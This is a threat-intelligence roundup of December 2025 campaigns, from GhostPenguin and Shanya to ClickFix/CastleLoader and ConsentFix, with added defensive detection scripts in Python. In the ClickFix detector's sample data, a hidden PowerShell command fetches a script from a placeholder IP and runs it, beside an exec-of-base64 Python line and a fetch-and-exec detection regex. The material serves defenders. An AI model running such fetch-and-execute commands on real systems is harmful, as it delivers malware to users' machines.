
Anomali Cyber Watch: GhostPenguin, SharePoint Exploits, Android Spyware, CastleLoader Malware Expansion, and more

Anomali Threat Research
December 16, 2025

GhostPenguin: Undetected Linux Backdoor Emerges from AI-Driven Threat Hunting

(published: December 8, 2025)

Researchers have uncovered a previously unknown Linux backdoor dubbed GhostPenguin, detected via their AI-powered threat hunting pipeline after it eluded traditional detection for over four months. GhostPenguin is a modular, multithreaded implant written in C++, offering remote shell access and full file system manipulation. Communication with its command-and-control server uses a custom RC5-encrypted UDP protocol, likely crafted to bypass conventional network and antivirus defenses. Upon execution, the malware performs a singleton check to avoid duplicate runs, obtains a session ID via handshake, then uses that ID to encrypt subsequent traffic, ensuring stealth and persistence.

Analyst Comment: GhostPenguin’s real significance lies in how it stayed hidden. Its custom RC5-encrypted UDP protocol and clean C++ architecture meant there were no familiar signatures, no predictable payload patterns, and no obvious network markers for traditional tools to catch. This is the kind of threat that slips quietly through any environment that assumes normal-looking Linux processes are inherently trustworthy. Defenders should take this as a cue to widen their lens: outbound UDP to unexpected destinations or non-standard ports, binaries that perform network operations with no clear purpose, and processes that maintain long-lived but low-volume connections are exactly where implants like GhostPenguin live.

MITRE ATT&CK: T1059.004 - Command and Scripting Interpreter: Unix Shell | T1021 - Remote Services | T1219 - Remote Access Software
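
The hunting heuristic in the comment above (long-lived, low-volume UDP to a fixed destination with regular timing) can be turned into a query over per-process flow telemetry. The Python below is an added example, not code from the GhostPenguin report or from Anomali; the flow records, process names and addresses are constructed, and the record layout (timestamp, protocol, process, destination, bytes) is an assumption about what your eBPF, auditd or Zeek-plus-process data would provide.

```python
"""Hunt for long-lived, low-volume outbound UDP beacons in per-process flow telemetry.

Added example; the records below are constructed, not GhostPenguin traffic.
"""
import statistics
from collections import defaultdict

# UDP ports where steady low-volume traffic is expected (DNS, NTP, DHCP, mDNS).
EXPECTED_UDP_PORTS = {53, 123, 67, 68, 5353}


def build_sample_flows():
    """Return constructed (epoch_seconds, proto, process, dst_ip, dst_port, bytes) records."""
    base = 1_700_000_000
    flows = []
    # A fixed-interval beacon: one 48-byte datagram every 10 minutes for two hours.
    flows += [(base + 600 * i, "udp", "udevd-helper", "203.0.113.10", 9000, 48) for i in range(13)]
    # Normal resolver traffic on 53, which the port allowlist should ignore.
    flows += [(base + 180 * i, "udp", "systemd-resolved", "10.0.0.2", 53, 70) for i in range(40)]
    # A short, high-volume media stream: large datagrams, brief duration.
    flows += [(base + i, "udp", "ffmpeg", "198.51.100.7", 5004, 1200) for i in range(200)]
    # A long-lived TCP session, out of scope for a UDP hunt.
    flows += [(base + 300 * i, "tcp", "sshd", "10.0.0.5", 22, 512) for i in range(20)]
    return flows


def find_udp_beacons(flows, min_duration_s=3600, min_events=6, max_avg_bytes=256, max_jitter=0.25):
    """Group datagrams by (process, destination) and flag the groups that look like beacons.

    A beacon here is UDP to a non-allowlisted port, alive for at least min_duration_s,
    with small datagrams and a regular send interval (coefficient of variation <= max_jitter).
    """
    groups = defaultdict(list)
    for ts, proto, proc, dst_ip, dst_port, nbytes in flows:
        if proto == "udp" and dst_port not in EXPECTED_UDP_PORTS:
            groups[(proc, dst_ip, dst_port)].append((ts, nbytes))

    findings = []
    for (proc, dst_ip, dst_port), events in groups.items():
        events.sort()
        if len(events) < min_events:
            continue
        times = [t for t, _ in events]
        duration = times[-1] - times[0]
        avg_bytes = sum(b for _, b in events) / len(events)
        intervals = [b - a for a, b in zip(times, times[1:])]
        mean_gap = statistics.mean(intervals)
        jitter = statistics.pstdev(intervals) / mean_gap if mean_gap else float("inf")
        if duration >= min_duration_s and avg_bytes <= max_avg_bytes and jitter <= max_jitter:
            findings.append({
                "process": proc, "dst": f"{dst_ip}:{dst_port}", "events": len(events),
                "duration_s": duration, "avg_bytes": round(avg_bytes, 1),
                "mean_interval_s": round(mean_gap, 1), "jitter": round(jitter, 3),
            })
    return sorted(findings, key=lambda f: f["duration_s"], reverse=True)


if __name__ == "__main__":
    for finding in find_udp_beacons(build_sample_flows()):
        print(finding)
```

Only the fixed-interval "udevd-helper" group survives: the resolver is excluded by port, the media stream is too short-lived, and the SSH session is TCP. In production, tune the thresholds to your environment and expect real implants to add jitter, which is why the coefficient-of-variation bound is a parameter rather than an exact-match check.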

Trust-Themed Phishing Surge Exploits SharePoint and e-Signature Workflows

(published: December 9, 2025)

Researchers recently uncovered a mass phishing campaign that sent over 40,000 malicious emails to roughly 6,100 organisations over a two-week span. The emails impersonated trusted file-sharing and electronic-signature platforms (e.g. SharePoint and generic “eSign” services), using spoofed display names and official-looking logos to appear legitimate. All phishing links were wrapped in a trusted URL-rewriting service (Mimecast Protect), which helped bypass automated security filters and lower end-user suspicion. Once clicked, users were directed to fraudulent sites designed to harvest credentials or sensitive financial data, often under the guise of document review or contract approval. The campaign targeted a wide swath of sectors (consulting, real estate, manufacturing, finance, healthcare, and more), largely in the United States, Europe, Canada, Asia, Australia, and the Middle East.

Analyst Comment: The most important insight from this campaign is how effectively the attackers weaponised a legitimate redirect service to manufacture trust. By funnelling every malicious link through Mimecast Protect, they bypassed both user suspicion and automated filtering, since the initial URL appeared clean and familiar. That single tactic gave their spoofed SharePoint and e-signing messages an air of authenticity that is hard to counter with traditional controls.

MITRE ATT&CK: T1566.002 - Phishing: Spearphishing Link | T1204.002 - User Execution: Malicious File | T1553.002 - Subvert Trust Controls: Code Signing | T1056.003 - Input Capture: Web Portal Capture

Target Industry: Commercial, Manufacturing, Financial services, Healthcare

Target Region: Americas

Target Country: United States

Shanya Packer-as-a-Service Enables Evasive Ransomware Delivery

(published: December 9, 2025)

Security researchers have identified a new "packer-as-a-service" (PaaS) tool called Shanya that is rapidly becoming a key enabler for ransomware gangs. According to vendor research, Shanya wraps existing ransomware or malware payloads in a highly obfuscated loader that uses DLL side-loading, memory manipulation techniques, custom encryption per customer, anti-analysis checks (e.g., anti-VM, sandbox resistance), and AMSI bypasses. Once inside a target environment, it drops both a legitimate but vulnerable signed driver (ThrottleStop.sys) and a malicious unsigned driver (hlpdrv.sys), a bring-your-own-vulnerable-driver (BYOVD) technique that gives it kernel-level write access. This enables the tool to terminate or disable endpoint detection and response (EDR) products, paving the way for ransomware execution, effectively acting as an "EDR killer." Multiple ransomware groups, including Akira, Medusa and Qilin, have been observed using Shanya across global campaigns in 2025.

Analyst Comment: What makes Shanya especially concerning is how neatly it plugs into the wider ecosystem of malicious as-a-service offerings that now function like a build-your-own-attack marketplace. Threat actors can pair Shanya with rented loaders, stealers, access brokers, bulletproof hosting, and proxy networks to create tailored, highly evasive intrusion chains without needing deep technical skill. Shanya becomes the attachment that neutralises EDR so everything else in the loadout can operate without resistance. This modularity means defenders are no longer dealing with single malware families but with custom-built stacks assembled from interchangeable services. The practical takeaway is that detection must focus on the early signals that indicate assembly of these components, especially suspicious driver activity, kernel-level manipulation, and pre-ransom execution patterns. The service-driven nature of Shanya ensures these evasion capabilities will spread quickly, so defending against the entire ecosystem rather than individual tools is now essential.

MITRE ATT&CK: T1574.002 - Hijack Execution Flow: DLL Side-Loading | T1027 - Obfuscated Files or Information | T1027.010 - Obfuscated Files or Information: Command Obfuscation | T1562.001 - Impair Defenses: Disable or Modify Tools | T1562.006 - Impair Defenses: Indicator Blocking | T1055 - Process Injection | T1068 - Exploitation for Privilege Escalation | T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control | T1112 - Modify Registry | T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification | T1204.002 - User Execution: Malicious File | T1059 - Command and Scripting Interpreter | T1547 - Boot or Logon Autostart Execution | T1486 - Data Encrypted for Impact
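
The "suspicious driver activity" the comment singles out has a concrete shape in endpoint telemetry: a signed-but-vulnerable driver and an unsigned driver loading from the same user-writable directory within seconds of each other. The Python below is an added example (not Shanya's code and not a vendor rule) that scores Sysmon Event ID 6 (DriverLoad) records that way. The event rows and the one-entry vulnerable-driver excerpt are constructed; a real deployment would feed the full LOLDrivers list or your EDR's blocklist into KNOWN_VULNERABLE_DRIVERS.

```python
"""Flag suspicious kernel-driver loads and BYOVD pairs in Sysmon Event ID 6 records.

Added example. The events and the vulnerable-driver excerpt are constructed; use a
maintained list (e.g. the LOLDrivers feed) in production.
"""
from datetime import datetime

# Constructed excerpt of a vulnerable-driver blocklist (file names, lower-case).
KNOWN_VULNERABLE_DRIVERS = {"throttlestop.sys"}
# Directories a standard user can write to; legitimate drivers are not loaded from here.
USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")

# Constructed Sysmon Event ID 6 (DriverLoad) records; the publisher string is made up.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-12-09 10:14:02.113", "ImageLoaded": "C:\\Windows\\System32\\drivers\\ndis.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"UtcTime": "2025-12-09 10:21:40.550", "ImageLoaded": "C:\\ProgramData\\ts\\ThrottleStop.sys",
     "Signed": "true", "Signature": "Example Hardware Vendor", "SignatureStatus": "Valid"},
    {"UtcTime": "2025-12-09 10:21:41.902", "ImageLoaded": "C:\\ProgramData\\ts\\hlpdrv.sys",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unsigned"},
    {"UtcTime": "2025-12-09 11:05:00.000", "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]


def _parse_time(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def _dirname(path):
    return path.lower().rsplit("\\", 1)[0]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify_driver_load(event):
    """Return the set of reasons a single DriverLoad event deserves attention (empty = benign)."""
    path = event["ImageLoaded"].lower()
    reasons = set()
    if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
        reasons.add("unsigned_or_invalid_signature")
    if _basename(path) in KNOWN_VULNERABLE_DRIVERS:
        reasons.add("known_vulnerable_driver")
    if path.startswith(USER_WRITABLE_PREFIXES):
        reasons.add("user_writable_path")
    return reasons


def find_byovd_pairs(events, window_s=300):
    """Pair a known-vulnerable driver load with an unsigned driver load from the same
    directory within window_s seconds: the staging sequence of an EDR killer."""
    flagged = [(e, classify_driver_load(e)) for e in events]
    vulnerable = [e for e, r in flagged if "known_vulnerable_driver" in r]
    unsigned = [e for e, r in flagged if "unsigned_or_invalid_signature" in r]
    pairs = []
    for v in vulnerable:
        for u in unsigned:
            delta = abs((_parse_time(u["UtcTime"]) - _parse_time(v["UtcTime"])).total_seconds())
            if delta <= window_s and _dirname(u["ImageLoaded"]) == _dirname(v["ImageLoaded"]):
                pairs.append({"vulnerable": _basename(v["ImageLoaded"]),
                              "unsigned": _basename(u["ImageLoaded"]),
                              "seconds_apart": round(delta, 3)})
    return pairs


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(_basename(event["ImageLoaded"]), sorted(classify_driver_load(event)))
    print(find_byovd_pairs(SAMPLE_EVENTS))
```

Either half of the pair is worth a medium-severity alert on its own; the pair within a short window from a ProgramData or user-profile path is the high-confidence signal, and it fires before the EDR process is killed, which is the only moment the sensor can still report it.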

ClayRat Upgrades Android Spyware to Expand Global Surveillance Capability

(published: December 8, 2025)

Researchers have identified a new variant of the ClayRat Android spyware that introduces stronger evasion, broader data theft and wider targeting across Russia and neighboring regions. The updated version disguises itself as legitimate messaging apps, video platforms, or regional services, abusing the default SMS handler role and Accessibility Services to deploy keyloggers that capture PINs and passwords, enable full screen recording through the MediaProjection API, and automatically unlock devices using stolen credentials. The malware exfiltrates contacts, messages, call logs, location data and device identifiers while disabling Google Play Protect to prevent removal. More than 700 unique APKs have been detected, distributed through Telegram channels, phishing sites and cloud platforms like Dropbox, primarily targeting Russian-speaking users. The campaign maintains infrastructure overlap with earlier ClayRat activity first observed in October 2025.

Analyst Comment: ClayRat's evolution demonstrates a shift toward sophisticated mobile espionage that achieves full device takeover through Accessibility Service abuse. The operators have built a surveillance platform that prevents victims from shutting down devices or removing the malware while continuously harvesting credentials and screen content. For defenders, mobile ecosystems require the same scrutiny as desktops. Implement device-level mobile threat detection, restrict Accessibility Service permissions, monitor for SMS handler abuse, and flag abnormal outbound traffic including WebSocket connections. Organizations using BYOD models face elevated risk from MFA interception and credential theft. Security teams must treat mobile telemetry and app provenance as critical signals to detect threats designed to blend into daily use.

MITRE ATT&CK: T1660 - Phishing | T1624.001 - Event Triggered Execution: Broadcast Receivers | T1655.001 - Masquerading: Match Legitimate Name or Location | T1516 - Input Injection | T1406.002 - Obfuscated Files or Information: Software Packing | T1517 - Access Notifications | T1417.001 - Input Capture: Keylogging | T1417.002 - Input Capture: GUI Input Capture | T1418 - Application Discovery | T1426 - System Information Discovery | T1513 - Screen Capture | T1512 - Capture Camera | T1616 - Call Control | T1636.002 - Protected User Data: Call Log | T1636.004 - Protected User Data: SMS Messages | T1481.002 - Web Service: Bidirectional Communication | T1646 - Exfiltration Over C2 Channel | T1582 - SMS Control

Target Region: Eastern Europe

Target Country: Russian Federation

CastleLoader Malware Expands Capabilities Through New Social Engineering Delivery

(published: December 10, 2025)

CastleLoader infections are increasing across recent campaigns in which operators now rely on the ClickFix lure to initiate execution. Once the user-supplied command runs, the malware begins a multi-stage fileless sequence that fetches an encrypted payload, uses Python-based components to decode and launch shellcode in memory, and then retrieves a final module from attacker servers. CastleLoader is engineered as a flexible loader that supports interchangeable plug-ins, enabling delivery of information stealers, remote access tools, and other commodity malware. Previous activity linked to the same family includes distribution of Lumma Stealer through fake repositories and traffic-manipulation funnels. The updated campaigns indicate continued investment in modular staging and memory-only execution, which reduces forensic visibility and weakens signature-based detection.

Analyst Comment: ClickFix’s rise matters because it removes much of the friction that typically limits social engineering campaigns. It turns a simple prompt into reliable execution, and that predictability gives operators the confidence to pair it with more advanced tooling. CastleLoader is a prime example. The loader is no longer just a staging mechanism but a way for attackers to future-proof their operations. Its in-memory design and modular plug-ins mean the final payload almost becomes irrelevant; what matters is a framework that can adapt faster than defenders can write signatures. The strategic insight is that campaigns like this shift the balance of power toward loaders that behave like platforms. Defenders should pivot accordingly, concentrating detection around the early behavioral seams that ClickFix and CastleLoader cannot fully hide, such as unexpected command invocation from the shell, Python-based subprocess chains, and brief encrypted retrievals.

MITRE ATT&CK: T1204.002 - User Execution: Malicious File | T1059 - Command and Scripting Interpreter | T1059.006 - Command and Scripting Interpreter: Python | T1620 - Reflective Code Loading | T1027 - Obfuscated Files or Information | T1055 - Process Injection | T1027.005 - Obfuscated Files or Information: Indicator Removal from Tools | T1655 - Masquerading | T1105 - Ingress Tool Transfer
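
The "behavioral seam" the comment points at is process ancestry: a ClickFix victim pastes a command into the Run box or a terminal, so the resulting shell is a child of explorer.exe, and the Python stage that follows carries an in-memory fetch-and-exec command line. The Python below is an added example (not CastleLoader code or a published rule) that walks constructed Sysmon Event ID 1-style process rows and reports such chains. Paths, PIDs and command lines are all constructed; the exact fragments in INMEMORY_PATTERN are an assumption you should replace with what your own telemetry shows.

```python
"""Find ClickFix-style process chains: a shell started from explorer.exe (Run box or
desktop) that goes on to spawn a Python stage running code straight from its command line.

Added example; the process rows below are constructed, not CastleLoader telemetry.
"""
import re

# Constructed process-creation events: (ProcessId, ParentProcessId, Image, CommandLine).
SAMPLE_PROCESSES = [
    (800, 4, "C:\\Windows\\System32\\wininit.exe", "wininit.exe"),
    (1000, 800, "C:\\Windows\\explorer.exe", "explorer.exe"),
    # The pasted ClickFix command: a hidden PowerShell that fetches and hands off to Python.
    (2000, 1000, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -w hidden -c \"iwr http://203.0.113.5/s.py -o $env:TEMP\\s.py; python $env:TEMP\\s.py\""),
    # The Python stage decoding and exec'ing a blob in memory (the blob here is just print(1)).
    (2100, 2000, "C:\\Users\\alice\\AppData\\Local\\Programs\\Python\\python.exe",
     "python.exe -c \"import urllib.request,base64;exec(base64.b64decode(b'cHJpbnQoMSk='))\""),
    # Benign: a user running a directory listing from the Run box.
    (3000, 1000, "C:\\Windows\\System32\\cmd.exe", "cmd /c dir"),
    # Benign: an editor launched from explorer that starts a normal dev server.
    (3500, 1000, "C:\\Users\\alice\\AppData\\Local\\Programs\\VSCode\\Code.exe", "Code.exe"),
    (4000, 3500, "C:\\Users\\alice\\AppData\\Local\\Programs\\Python\\python.exe",
     "python manage.py runserver"),
]

SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments typical of fetch-and-exec-in-memory stages (assumed, tune to taste).
INMEMORY_PATTERN = re.compile(r"(-c\s|exec\(|b64decode|urllib|iwr\s|downloadstring)", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_clickfix_chains(processes):
    """Return one chain (list of image names, root first) per suspicious script host whose
    ancestry passes through a shell host and reaches explorer.exe."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in processes}
    chains = []
    for pid, (ppid, image, cmd) in by_pid.items():
        if _basename(image) not in SCRIPT_HOSTS or not INMEMORY_PATTERN.search(cmd):
            continue
        chain = [_basename(image)]
        seen_shell = False
        cur = ppid
        while cur in by_pid:                      # walk up until the tree runs out
            parent_ppid, parent_image, _ = by_pid[cur]
            name = _basename(parent_image)
            chain.append(name)
            if name in SHELL_HOSTS:
                seen_shell = True
            elif name == "explorer.exe":
                if seen_shell:                    # shell between explorer and the script host
                    chains.append(list(reversed(chain)))
                break
            cur = parent_ppid
    return chains


if __name__ == "__main__":
    for chain in find_clickfix_chains(SAMPLE_PROCESSES):
        print(" -> ".join(chain))
```

The developer's python.exe under Code.exe is ignored twice over: its command line has no in-memory fragment, and its ancestry reaches explorer.exe without passing through a shell. A production rule would also keep the full command lines and the PowerShell's own download indicators for the analyst.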

React2Shell Exploitation Delivers New Malware Across Multiple Sectors

(published: December 10, 2025)

Active exploitation of a critical remote code execution flaw in React Server Components, tracked as CVE-2025-55182 and dubbed React2Shell, is resulting in widespread malicious activity. Threat actors are leveraging this unauthenticated RCE vulnerability to deploy cryptocurrency miners, Linux backdoors, reverse proxy tools, and advanced post-exploit implants. Analysis from Huntress and multiple intel sources indicates automated tooling scanning for vulnerable React and Next.js instances and delivering payloads such as PeerBlight, CowTunnel, ZinFoq, and Kaiji variants across diverse industry sectors. The flaw impacts React 19.x Server Components and associated frameworks like Next.js, with public proofs of concept and active attacks emerging within hours of disclosure. Security authorities including CISA have added React2Shell to the Known Exploited Vulnerabilities catalog, and defenders report opportunistic exploitation by state-linked groups and malware campaigns. Immediate patching to updated package versions is strongly recommended to mitigate ongoing risk.

Analyst Comment: The notable shift here is the growing sophistication of what React2Shell is delivering. Early activity centered on miners and basic scripts, but the latest reporting shows actors now pushing structured tooling like PeerBlight and CowTunnel that provide durable access, proxy capabilities, and staged execution. This turns React2Shell from a quick exploitation vector into a pathway for full post-compromise operations. Defenders should not only patch but also hunt for evidence of these payloads on any system that was exposed before updates were applied. The real risk now lies in silently deployed implants rather than the vulnerability itself.

MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059 - Command and Scripting Interpreter | T1505.003 - Server Software Component: Web Shell | T1027 - Obfuscated Files or Information | T1102 - Web Service | T1572 - Protocol Tunneling | T1106 - Native API | T1496 - Resource Hijacking

NANOREMOTE Windows Backdoor Abuses Google Drive API for Stealthy C2

(published: December 11, 2025)

Researchers have detailed a new Windows backdoor called NANOREMOTE that uses the Google Drive API as its command and control channel. The malware is built in C++ and supports system reconnaissance, command execution, and reliable file transfers that mirror legitimate Drive functionality. Researchers linked NANOREMOTE with a cluster they track as REF7707, noting shared code patterns, identical command handlers, matching AES cryptographic implementations, and hard-coded paths also found in the group's earlier FINALDRAFT implant. Delivery is performed by WMLOADER, a component that imitates a Bitdefender file and fetches the main payload. NANOREMOTE communicates over HTTP for its main C2 server while leveraging HTTPS for Google Drive API operations, using encrypted and compressed JSON objects, enabling it to blend into normal cloud traffic. Its modular command structure and cloud API integration indicate a focused effort to create persistent, low-visibility access to targeted systems.

Analyst Comment: NANOREMOTE stands out because it shows how refined cloud-based C2 has become for groups like REF7707. By nesting its operations inside Google Drive API calls, the malware forces defenders to rethink what suspicious traffic looks like. The real concern is not only the backdoor but the tactic behind it, where trusted cloud services become covert transport layers for long-term access. The reuse of handlers, cryptography, and design patterns across FINALDRAFT and NANOREMOTE points to a structured toolkit rather than isolated tooling, suggesting continued investment in this approach. Monitoring these subtle patterns is where this implant becomes visible, and where defenders can get ahead of similar cloud-embedded threats.

MITRE ATT&CK: T1204.002 - User Execution: Malicious File | T1059 - Command and Scripting Interpreter | T1071.001 - Application Layer Protocol: Web Protocols | T1071.004 - Application Layer Protocol: DNS | T1105 - Ingress Tool Transfer | T1090.003 - Proxy: Multi-Hop Proxy | T1036 - Masquerading | T1027 - Obfuscated Files or Information | T1082 - System Information Discovery

New ConsentFix Attack Hijacks Microsoft Accounts via Azure CLI

(published: December 11, 2025)

A newly observed threat called ConsentFix combines social engineering with OAuth abuse to compromise Microsoft accounts. In this attack, adversaries lure victims to compromised websites that rank highly in search results and host fake CAPTCHA and “Sign In” prompts. When the victim follows these prompts, they are guided into a legitimate Azure CLI OAuth authorization flow. Upon successful sign-in (or if already authenticated), the authorization server redirects the browser to the Azure CLI's registered redirect URI with the OAuth authorization code in the URL. The victim is then instructed to paste that URL back into the malicious page. By capturing and exchanging this code, attackers obtain Azure CLI access tokens, granting access as the user without needing the password or a fresh MFA challenge, since the victim already satisfied MFA during the legitimate sign-in. Because the attack leverages a first-party Microsoft application (Azure CLI), many tenant-level consent restrictions do not block it.

Analyst Comment: ConsentFix marks a shift in identity compromise techniques by building on the familiar ClickFix interaction pattern and moving it from malware delivery to token theft. It shows that attackers no longer need passwords or MFA challenges to take over Microsoft accounts. The threat hinges on abusing a legitimate Azure CLI OAuth flow, which means traditional credential-centric defenses provide little value here. What matters is whether a user can be manipulated into completing an authentication step and handing over the resulting redirect URL. For defenders, the immediate priority is to treat Azure CLI activity as a monitored surface, especially in environments where its use is uncommon. Alerting on Azure CLI sign-ins by users who have never used it, restricting which users can sign in to Azure CLI at all (for example, through Conditional Access), and educating users that no legitimate Microsoft workflow requires pasting redirect URLs are actionable steps that materially reduce exposure.

MITRE ATT&CK: T1566.002 - Phishing: Spearphishing Link | T1528 - Steal Application Access Token | T1550.001 - Use Alternate Authentication Material: Application Access Token | T1098 - Account Manipulation
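
The identity-side seam this attack leaves is an Azure CLI sign-in by a user who has never used Azure CLI. The Python below is an added example (not a Microsoft or vendor detection) that learns a per-user baseline from older sign-in records and alerts on later first-seen Azure CLI use. The records are constructed in the shape of a subset of Microsoft Graph signIn fields; the application id is the real, well-known first-party Azure CLI client id, while the trusted network range and the second application id are made up. Note that the interactive sign-in carries the victim's own address; a source address from outside your networks is most likely to appear later, in non-interactive sign-ins, when the attacker redeems the refresh token from their own host, so feed both logs in.

```python
"""Flag first-seen Azure CLI sign-ins, the identity-side seam a ConsentFix token theft leaves.

Added example. Records are constructed in the shape of Microsoft Graph signIn objects
(a subset of fields); only AZURE_CLI_APP_ID is a real, well-known value.
"""
import ipaddress
from datetime import datetime

AZURE_CLI_APP_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"   # first-party "Microsoft Azure CLI"
TRUSTED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]  # constructed corporate egress range
OTHER_APP_ID = "11111111-2222-3333-4444-555555555555"        # constructed id for an unrelated app

SAMPLE_SIGNINS = [
    {"createdDateTime": "2025-11-20T09:00:00Z", "userPrincipalName": "ops@example.com",
     "appId": AZURE_CLI_APP_ID, "ipAddress": "203.0.113.20", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-12-11T08:30:00Z", "userPrincipalName": "ops@example.com",
     "appId": AZURE_CLI_APP_ID, "ipAddress": "203.0.113.21", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-12-11T10:02:00Z", "userPrincipalName": "finance@example.com",
     "appId": OTHER_APP_ID, "ipAddress": "203.0.113.30", "status": {"errorCode": 0}},
    # A finance user who has never touched Azure CLI, seen from outside the corporate range.
    {"createdDateTime": "2025-12-11T14:22:00Z", "userPrincipalName": "finance@example.com",
     "appId": AZURE_CLI_APP_ID, "ipAddress": "198.51.100.77", "status": {"errorCode": 0}},
    # A failed attempt (wrong password) establishes nothing and triggers nothing.
    {"createdDateTime": "2025-12-11T14:25:00Z", "userPrincipalName": "intern@example.com",
     "appId": AZURE_CLI_APP_ID, "ipAddress": "203.0.113.40", "status": {"errorCode": 50126}},
]


def _ts(value):
    """Parse Graph's ISO-8601 timestamps, which end in 'Z' rather than '+00:00'."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _trusted(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETWORKS)


def detect_first_seen_azure_cli(signins, baseline_until):
    """Learn which users normally use Azure CLI from records before baseline_until, then flag
    every later successful Azure CLI sign-in by a user with no such history. An untrusted
    source network raises the severity."""
    cutoff = _ts(baseline_until)
    baseline, findings = set(), []
    for rec in sorted(signins, key=lambda r: _ts(r["createdDateTime"])):
        if rec["appId"] != AZURE_CLI_APP_ID or rec["status"]["errorCode"] != 0:
            continue
        user = rec["userPrincipalName"].lower()
        if _ts(rec["createdDateTime"]) < cutoff:
            baseline.add(user)
            continue
        if user in baseline:
            continue
        reasons = ["first_seen_azure_cli"]
        if not _trusted(rec["ipAddress"]):
            reasons.append("untrusted_source_ip")
        findings.append({"user": user, "time": rec["createdDateTime"], "ip": rec["ipAddress"],
                         "reasons": reasons, "severity": "high" if len(reasons) > 1 else "medium"})
        baseline.add(user)   # alert once per user, not on every subsequent token use
    return findings


if __name__ == "__main__":
    for finding in detect_first_seen_azure_cli(SAMPLE_SIGNINS, "2025-12-01T00:00:00Z"):
        print(finding)
```

The ops user is silent because their history predates the cutoff; the finance user is the one alert, and the source address pushes it to high. A real baseline window should be long enough to cover infrequent but legitimate CLI users, and the alert should link straight to a token-revocation runbook, since the token, not the password, is what the attacker holds.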

Supply Chain Attacks on GitHub Actions Surge in 2025

(published: December 12, 2025)

Security researchers have documented a sustained increase in supply chain attacks targeting GitHub Actions, the CI/CD automation platform embedded across modern software development workflows. Reporting from Black Hat Europe 2025 highlights how attackers are exploiting trust assumptions and misconfigurations in third-party Actions to access secrets and tamper with build pipelines. A notable example is the compromise of the widely used tj-actions/changed-files Action (CVE-2025-30066), which exposed credentials such as AWS keys and GitHub tokens across thousands of repositories. Advisories from CISA and other security bodies stress that while GitHub provides the platform, organizations retain responsibility for how Actions are selected, configured, and trusted. The incidents illustrate how developer convenience, when left unchecked, can translate into systemic supply chain risk at scale.

Analyst Comment: This activity is less about a new weakness and more about an old assumption being stressed at scale. GitHub is effectively shared infrastructure for the software industry, which makes it a predictable and efficient target for adversaries. When a popular Action is compromised, trust propagates faster than detection. The key intelligence insight is responsibility: supply chain security cannot be outsourced to the platform alone. Organizations decide which Actions they run, how they are pinned, and what permissions they receive. Defenders should treat GitHub Actions as first-class production assets, pinning Actions to full commit SHAs rather than mutable tags, granting least-privilege tokens, and auditing workflows routinely to limit the blast radius when upstream trust fails.

MITRE ATT&CK: T1195 - Supply Chain Compromise | T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools | T1140 - Deobfuscate/Decode Files or Information | T1114 - Email Collection
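
The two controls the comment names, SHA pinning and least-privilege tokens, are mechanical enough to audit automatically. The Python below is an added example (not GitHub tooling and not from the Black Hat talk) that checks a workflow file for `uses:` references that are not full 40-character commit SHAs and for a missing or over-broad top-level `permissions:` block. Both workflow texts are constructed; the commit hash in the hardened version is a placeholder, not a real commit of either action. Pinning to a tag such as `@v4` or a branch such as `@main` is exactly what left the tj-actions/changed-files consumers exposed when the tags were moved, which a commit SHA does not allow.

```python
"""Audit a GitHub Actions workflow for mutable action references and missing least-privilege
token scopes. Added example; both workflow texts are constructed and the SHA is a placeholder.
"""
import re

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Weak setting: mutable tag and branch references, and no permissions block at all.
WEAK_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: tj-actions/changed-files@main
      - run: ./build.sh
"""

# Corrected setting: read-only token and a commit-SHA pin (placeholder hash, replace with
# the commit you actually reviewed).
HARDENED_WORKFLOW = """\
name: ci
on: [pull_request]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - run: ./build.sh
"""


def audit_workflow(text):
    """Return a list of (line_number, problem) tuples; line_number is None for file-level issues."""
    problems = []
    has_permissions = False
    for lineno, line in enumerate(text.splitlines(), 1):
        if re.match(r"^permissions:", line):          # top-level only: no indentation
            has_permissions = True
            if re.match(r"^permissions:\s*write-all", line):
                problems.append((lineno, "top-level permissions grants write-all"))
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue   # local path or image reference, not a tag-resolved marketplace action
        name, _, version = ref.partition("@")
        if not version:
            problems.append((lineno, f"{name} has no version reference at all"))
        elif not SHA_RE.match(version):
            problems.append((lineno, f"{name} pinned to mutable ref '{version}', not a commit SHA"))
    if not has_permissions:
        problems.append((None, "no top-level permissions block; GITHUB_TOKEN gets the repository default"))
    return problems


if __name__ == "__main__":
    for label, text in (("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, audit_workflow(text))
```

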